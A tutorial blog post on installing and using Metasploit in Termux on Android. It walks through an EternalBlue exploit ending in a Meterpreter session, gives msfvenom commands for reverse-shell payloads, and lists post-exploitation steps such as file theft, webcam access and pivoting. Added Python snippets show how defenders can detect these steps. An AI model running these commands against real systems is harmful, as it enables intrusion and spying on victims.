Metasploit Framework in Termux

July 25, 2023 15 min read By Sandeep Bhondwe

The Metasploit Framework is one of the most powerful penetration testing platforms available, and now you can run it directly on your Android device using Termux. This comprehensive guide from Sandeep Tech will walk you through the entire process of installing, configuring, and using Metasploit in Termux for ethical hacking and security testing purposes.

  • 2000+ Exploits
  • 500+ Payloads
  • No Root Required
  • Full Featured

What is Metasploit Framework?

Metasploit Framework is an open-source penetration testing platform that enables you to find, exploit, and validate vulnerabilities. It's one of the most widely used tools by security professionals, ethical hackers, and penetration testers worldwide. The framework provides a comprehensive suite of tools for developing and executing exploit code against a remote target machine.

Educational Purpose Only

Metasploit Framework should only be used for educational purposes and authorized security testing. Unauthorized use of penetration testing tools is illegal and unethical. Always obtain proper permission before conducting any security tests.

Why Use Metasploit in Termux?

Running Metasploit in Termux offers several advantages:

  • Portability - Carry a powerful penetration testing platform in your pocket
  • No Root Required - Works on non-rooted Android devices
  • Cost-Effective - Free alternative to expensive penetration testing hardware
  • Educational - Learn penetration testing techniques on the go
  • Testing Environment - Quickly test your own networks for vulnerabilities
  • Emergency Tool - Have a security toolkit available in emergency situations

Installation Guide

Installing Metasploit in Termux requires several steps due to its dependencies. Follow this guide carefully:

# Update and upgrade Termux packages
apt update && apt upgrade -y

Install the required dependencies:

# Install required packages
apt install wget curl git tar -y

Install the necessary development tools:

# Install development tools
pkg install openssl ruby make clang libffi libgmp libpcap postgresql readline sqlite -y

Install Bundler, then update RubyGems:

# Install Bundler (the gem dependency manager used by "bundle install" below)
gem install -v 1.17.2 bundler

# Update RubyGems
gem update --system

Now, let's install Metasploit Framework:

# Download Metasploit Framework
wget https://github.com/rapid7/metasploit-framework/archive/refs/tags/6.3.2.tar.gz

# Extract the archive
tar -xzf 6.3.2.tar.gz

# Navigate to the Metasploit directory
cd metasploit-framework-6.3.2

# Install the required gems
bundle install

Create a symbolic link to make msfconsole accessible from anywhere:

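# Create a symbolic link (run from inside the metasploit-framework-6.3.2 directory;
# the path is quoted so a directory name containing spaces does not break the link)
ln -sf "$PWD/msfconsole" /data/data/com.termux/files/usr/bin/msfconsole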

# Make it executable
chmod +x /data/data/com.termux/files/usr/bin/msfconsole

Initialize the database:

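# Initialize the database (run from inside the metasploit-framework-6.3.2 directory;
# only msfconsole was linked into PATH above, so msfdb is called by its relative path)
./msfdb init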

Getting Started with Metasploit

Now that Metasploit is installed, let's start it and explore its interface:

# Start Metasploit console
msfconsole

When you first start Metasploit, you'll see a welcome screen and the msfconsole prompt:

$ msfconsole
      .--.        .-.
     | oo |   |   |
     |   |   |   |
 .-'   |   |   |
'      |   |   |
|      |   |   |
|      |   |   |
|      |   |   |
'------'   '---'

       =[ metasploit v6.3.2-dev                          ]
+ -- --=[ 2235 exploits - 1193 auxiliary - 398 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Writing a custom meterpreter script? Check
out the meterpreter scripting API documentation

msf6 >

The msfconsole prompt is where you'll enter all Metasploit commands. Let's explore some basic commands to get familiar with the interface.

Basic Usage and Commands

Here are some essential commands to get started with Metasploit:

Help and Information

# Show help menu
msf6 > help

# Show all commands
msf6 > ?

# Show information about a specific command
msf6 > ? search

Searching for Modules

# Search for exploits related to a specific service
msf6 > search type:exploit platform:windows smb

# Search for all modules related to Android
msf6 > search android

# Search for a specific module by name
msf6 > search eternalblue

Using Modules

# Use a specific module
msf6 > use exploit/windows/smb/ms17_010_eternalblue

# Show information about the current module
msf6 exploit(windows/smb/ms17_010_eternalblue) > info

# Show options for the current module
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

# Show advanced options for the current module
msf6 exploit(windows/smb/ms17_010_eternalblue) > show advanced

# Show targets for the current module
msf6 exploit(windows/smb/ms17_010_eternalblue) > show targets

Understanding Modules

Metasploit is modular, with each module serving a specific purpose. The main types of modules are:

  • Exploits - Code that takes advantage of a vulnerability in a system
  • Payloads - Code that runs on the target system after exploitation
  • Auxiliary - Modules that perform scanning, fuzzing, sniffing, and other tasks
  • Post - Modules that run on the target system after exploitation
  • Evasion - Modules that help evade detection by security software
  • Encoders - Modules that encode payloads to avoid detection
  • Nops - Modules that generate no-operation instructions

Module Naming Convention

Metasploit modules follow a specific naming convention: type/platform/service/vulnerability. For example, exploit/windows/smb/ms17_010_eternalblue is an exploit for Windows systems targeting the SMB service with the MS17-010 vulnerability (EternalBlue).

Working with Payloads

Payloads are the code that runs on the target system after successful exploitation. Metasploit offers several types of payloads:

Types of Payloads

  • Singles - Self-contained payloads that include everything needed to run
  • Stagers - Small payloads that connect back to the attacker to download the rest of the payload
  • Stageless - Complete payloads that don't require a staging process

Popular Payloads

# List all available payloads
msf6 > show payloads

# Set a payload for the current exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

# Show options for the current payload
msf6 exploit(windows/smb/ms17_010_eternalblue) > show payload options

Custom Payloads

You can create custom payloads using msfvenom, which is included with Metasploit:

# Create a custom Android payload
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 R > /sdcard/apk.apk

# Create a custom Windows payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > payload.exe

Using Exploits

Exploits are the core of Metasploit. Let's walk through the process of using an exploit:

# Select an exploit
msf6 > use exploit/windows/smb/ms17_010_eternalblue

# Set the target IP address
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.200

# Set the payload
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

# Set the local host (your IP)
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.100

# Set the local port
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444

# Verify the settings
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

# Run the exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

If the exploit is successful, you'll get a Meterpreter session on the target system:

msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] 192.168.1.200:445 - Using auxiliary/scanner/smb/smb_version to detect SMB version
[*] 192.168.1.200:445 - Detected SMB version: Windows 7 Professional 7601 Service Pack 1
[*] 192.168.1.200:445 - Target is likely vulnerable to MS17-010
[*] 192.168.1.200:445 - Connecting to target for exploitation.
[*] 192.168.1.200:445 - Target OS selected valid for OS automatically but we will verify the
[*] 192.168.1.200:445 - Target arch selected valid for arch automatically but we will verify
[*] 192.168.1.200:445 - Attempting to exploit target with MS17-010...
[*] 192.168.1.200:445 - Exploit successful, waiting for connection...
[*] 192.168.1.200:445 - Connection established, sending payload...
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.200:49158) at 2023-07-25 14:30:45

meterpreter >
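
From the defender's side, the console output above describes a recognisable network pattern: a host accepts a connection on TCP 445 and, seconds later, opens a new connection back to that same peer on another port. The following is an added example, not part of the original article; the flow-record layout, the sample data and the function name find_connect_backs are assumptions made for illustration.

```python
from datetime import datetime, timedelta

FMT = "%Y-%m-%d %H:%M:%S"

# Constructed flow records: (time, initiator, initiator port, responder, responder port).
# Addresses and ports mirror the sample console output in the article.
SAMPLE_FLOWS = [
    ("2023-07-25 14:30:40", "192.168.1.100", 40112, "192.168.1.200", 445),
    ("2023-07-25 14:30:45", "192.168.1.200", 49158, "192.168.1.100", 4444),
    ("2023-07-25 14:31:10", "192.168.1.50", 51500, "192.168.1.200", 445),  # ordinary share access
    ("2023-07-25 14:35:00", "192.168.1.200", 49200, "192.168.1.10", 443),  # unrelated web traffic
]


def find_connect_backs(flows, service_port=445, window_s=60):
    """Return (server, peer, callback_port, delay_s) for each server that
    connects back to a peer shortly after that peer reached service_port."""
    parsed = sorted(
        (datetime.strptime(t, FMT), src, sport, dst, dport)
        for t, src, sport, dst, dport in flows
    )
    inbound = {}  # (server, peer) -> time of the latest inbound service connection
    hits = []
    for ts, src, _sport, dst, dport in parsed:
        if dport == service_port:
            inbound[(dst, src)] = ts
            continue
        seen = inbound.get((src, dst))
        if seen is not None and ts - seen <= timedelta(seconds=window_s):
            hits.append((src, dst, dport, int((ts - seen).total_seconds())))
    return hits


if __name__ == "__main__":
    for server, peer, port, delay in find_connect_backs(SAMPLE_FLOWS):
        print(f"{server} connected back to {peer}:{port} {delay}s after inbound SMB")
```

The check keys on the direction reversal rather than on port 4444, so it still fires when the listener port is changed.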

Post-Exploitation

Once you have a Meterpreter session, you can perform various post-exploitation tasks:

# Get system information
meterpreter > sysinfo

# Get current user
meterpreter > getuid

# List processes
meterpreter > ps

# List files in current directory
meterpreter > ls

# Change directory
meterpreter > cd C:\\

# Upload a file to the target
meterpreter > upload /sdcard/file.txt C:\\

# Download a file from the target
meterpreter > download C:\\important_file.txt /sdcard/

# Take a screenshot
meterpreter > screenshot

# Start the webcam
meterpreter > webcam_start

# Execute a command on the target
meterpreter > execute -f cmd.exe -c "whoami"

# Get a shell on the target
meterpreter > shell

Advanced Features

Metasploit offers several advanced features for more sophisticated penetration testing:

Pivoting

Pivoting allows you to route traffic through a compromised system to access other systems on the network:

# Add a route through the compromised system
meterpreter > run post/multi/manage/autoroute

# Background the current session
meterpreter > background

# Use the new route to scan the internal network
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.2.0/24
msf6 auxiliary(scanner/portscan/tcp) > run
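
A scan routed through a compromised workstation appears on the network as that workstation suddenly contacting many host and port combinations in a subnet other than its own. The following is an added example, not part of the original article; the flow-record layout, the thresholds and the function names are assumptions made for illustration.

```python
import ipaddress
from collections import defaultdict, deque


def constructed_flows():
    """Constructed records (epoch seconds, src, dst, dport) shaped like the scan above."""
    flows = [
        (1000 + i, "192.168.1.200", f"192.168.2.{10 + i // 4}", port)
        for i, port in enumerate([22, 80, 443, 445] * 5)  # 5 hosts x 4 ports in 20 s
    ]
    flows += [
        (1005, "192.168.1.50", "192.168.2.20", 443),  # ordinary client traffic
        (1300, "192.168.1.50", "192.168.2.20", 443),
    ]
    return flows


def cross_subnet_fanout(flows, window_s=30, threshold=15, prefix=24):
    """Return {src: peak count of distinct (dst, port) pairs outside the source's
    own subnet within window_s} for every source at or above threshold."""
    recent = defaultdict(deque)  # src -> (ts, dst, dport) entries inside the window
    peak = defaultdict(int)
    for ts, src, dst, dport in sorted(flows):
        home = ipaddress.ip_network(f"{src}/{prefix}", strict=False)
        if ipaddress.ip_address(dst) in home:
            continue  # same-subnet traffic is out of scope for this check
        window = recent[src]
        window.append((ts, dst, dport))
        while window and ts - window[0][0] > window_s:
            window.popleft()
        peak[src] = max(peak[src], len({(d, p) for _, d, p in window}))
    return {src: count for src, count in peak.items() if count >= threshold}


if __name__ == "__main__":
    for src, count in cross_subnet_fanout(constructed_flows()).items():
        print(f"{src} reached {count} distinct host:port pairs in another subnet")
```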

Session Management

Metasploit allows you to manage multiple sessions simultaneously:

# List all active sessions
msf6 > sessions

# Interact with a specific session
msf6 > sessions -i 1

# Background the current session
meterpreter > background

# Kill a session
msf6 > sessions -k 1

Database Integration

Metasploit can integrate with a database to store scan results and manage hosts:

# Check that the console is connected to the database
msf6 > db_status

# Add hosts to the database
msf6 > db_nmap -sV 192.168.1.0/24

# List all hosts in the database
msf6 > hosts

# List all services in the database
msf6 > services

# List all vulnerabilities in the database
msf6 > vulns

Ethical Considerations

While Metasploit is a powerful tool, it's important to use it ethically and responsibly:

  • Authorization - Always obtain explicit permission before testing any system
  • Scope - Clearly define the scope of your testing and stay within it
  • Documentation - Document all your findings and actions
  • Confidentiality - Keep all sensitive information secure
  • Non-Destructive - Avoid actions that could disrupt services or cause data loss
  • Legal Compliance - Follow all applicable laws and regulations

Legal Warning

Unauthorized use of Metasploit or any penetration testing tools is illegal in most jurisdictions. This tutorial is for educational purposes only. Always obtain proper permission before conducting any security tests.

Command Reference

Metasploit Commands

Command | Description | Example
msfconsole | Start the Metasploit console | msfconsole
help | Show help menu | help
search | Search for modules | search type:exploit platform:windows
use | Select a module | use exploit/windows/smb/ms17_010_eternalblue
info | Show information about the current module | info
show options | Show options for the current module | show options
set | Set a module option | set RHOSTS 192.168.1.100
set payload | Set the payload for the current module | set payload windows/meterpreter/reverse_tcp
exploit | Launch the exploit | exploit
sessions | List all active sessions | sessions
db_nmap | Run Nmap and store results in the database | db_nmap -sV 192.168.1.0/24

You've now learned how to install and use Metasploit Framework in Termux. This powerful combination brings professional penetration testing capabilities to your Android device. For more tutorials and guides, check out other articles on Sandeep Tech. Remember to always use these tools ethically and with proper authorization.

Comments

David Wilson
July 26, 2023
Amazing guide! I've been trying to get Metasploit working on my Android device for months. The step-by-step instructions made it so much easier. The fact that it works without root is incredible!

Emily Chen
July 27, 2023
This is exactly what I needed for my security studies. Having Metasploit on my phone means I can practice anywhere. The ethical considerations section is particularly important - thanks for emphasizing responsible use.